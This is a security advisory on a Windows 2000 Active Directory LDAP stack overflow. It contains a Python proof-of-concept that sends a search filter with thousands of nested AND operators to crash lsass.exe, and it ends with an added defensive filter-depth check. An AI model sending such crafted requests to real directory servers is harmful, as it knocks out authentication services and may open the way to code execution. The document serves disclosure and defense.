Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability

Published: 2003-07-02
Updated: 2003-07-02
Severity: High
Threat: Remote administrator privileges
Error type: Boundary check error
Exploitation: Server mode
BUGTRAQ ID: 7930

Affected systems
Microsoft Windows 2000 Advanced Server SP3

Detailed description
Active Directory is a Windows 2000 component. The directory service it provides is based on the LDAP protocol, so Active Directory objects can be stored and retrieved over LDAP.

When an LDAPv3 search request containing 1000 nested "AND" operators is sent to the server, the lsass.exe service crashes. An attacker only needs to send such a 'search request' to the directory server, and it may lead to arbitrary code execution.

Test code
The Python script demonstrating the issue is as follows (it relies on an `Ldap` base class and an `asn1` module from the original test harness, which are not included on this page; the original was written for Python 2 and a missing `self` argument in the base-class constructor call has been corrected):
------------------------------------
# Assumed to come from the original harness: `Ldap` (provides bindRequest,
# searchRequest, encapsulateHeader and the LDAP_FILTER_* constants) and `asn1`.
class ActiveDirectoryDOS( Ldap ):

    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__(self)

    def generateFilter_BinaryOp( self, filter ):
        # Encode one (attribute, value) assertion as two OCTET STRINGs
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
        filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
        return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
        # Wrap the simple filter in numTimes nested AND filters
        simpleBinOp = self.generateFilter_BinaryOp( filter )
        filterBuffer = simpleBinOp
        for cnt in range( 0, numTimes ):
            filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
        return filterBuffer

    def searchSub( self, filterBuffer ):
        self.bindRequest()
        self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):
        # the machine must not exist
        machine_name = 'xaxax'
        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

        # execute the anonymous query
        print('executing query')
        filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
        self.searchSub( filterBuffer )
------------------------------------

Solution
Patch download:
Microsoft Windows 2000 Server SP3: Microsoft Upgrade Windows 2000 SP4
http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp
Microsoft Windows 2000 Advanced Server SP3: Microsoft Upgrade Windows 2000 SP4
http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp

Related information
Reference: http://www.securityfocus.com/advisories/5544
Related homepage: http://www.microsoft.com/windows2000/technologies/directory/ad/default.asp
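A defender-side check for the condition this advisory describes, added here as an example and not part of the advisory, of Core's test script or of Microsoft's code: it walks the BER encoding of an LDAP search Filter, computes how deeply and/or/not elements are nested, and flags anything beyond a configurable limit, which is what an LDAP proxy or IDS rule would do in front of a directory server. The tag values follow RFC 4511; the limit of 16 and the sample filters are constructed for illustration.

```python
"""Depth check for BER-encoded LDAP search filters (RFC 4511 Filter CHOICE).
Added example for this advisory; not Core's PoC nor Microsoft's code.
Sample inputs below are constructed by hand."""

# Context-specific constructed tags that nest other filters (RFC 4511 4.5.1)
FILTER_AND, FILTER_OR, FILTER_NOT = 0xA0, 0xA1, 0xA2
NESTING_TAGS = {FILTER_AND, FILTER_OR, FILTER_NOT}


def read_tlv(buf, pos):
    """Decode the BER tag/length at pos; return (tag, value_start, value_end)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long-form length: low 7 bits = number of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated BER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("BER value runs past end of buffer")
    return tag, pos, pos + length


def filter_depth(buf, pos=0, end=None):
    """Deepest and/or/not nesting in the Filter encoded in buf[pos:end]."""
    end = len(buf) if end is None else end
    deepest = 0
    while pos < end:
        tag, vstart, vend = read_tlv(buf, pos)
        if tag in NESTING_TAGS:  # recurse only into and/or/not elements
            deepest = max(deepest, 1 + filter_depth(buf, vstart, vend))
        pos = vend  # leaf elements (equalityMatch, present, ...) are skipped
    return deepest


def filter_exceeds_limit(buf, limit=16):
    """True if the filter nests deeper than limit (assumed policy value)."""
    return filter_depth(buf) > limit


# (name=xaxax): equalityMatch [3] { OCTET STRING "name", OCTET STRING "xaxax" }
EQ_NAME_XAXAX = bytes.fromhex("a30d" "0404" "6e616d65" "0405" "7861786178")
# (&(&(&(name=xaxax)))): three AND layers around the leaf, lengths 15/17/19
SAMPLE_DEPTH3 = bytes.fromhex("a013a011a00f") + EQ_NAME_XAXAX
# Same filter wrapped once more, using a long-form length octet (0x81 0x15)
SAMPLE_DEPTH4_LONGFORM = bytes.fromhex("a08115") + SAMPLE_DEPTH3
```

A request whose filter trips `filter_exceeds_limit` can be dropped or logged before it reaches lsass.exe; the recursion here is bounded by the input length, and malformed lengths raise rather than being trusted.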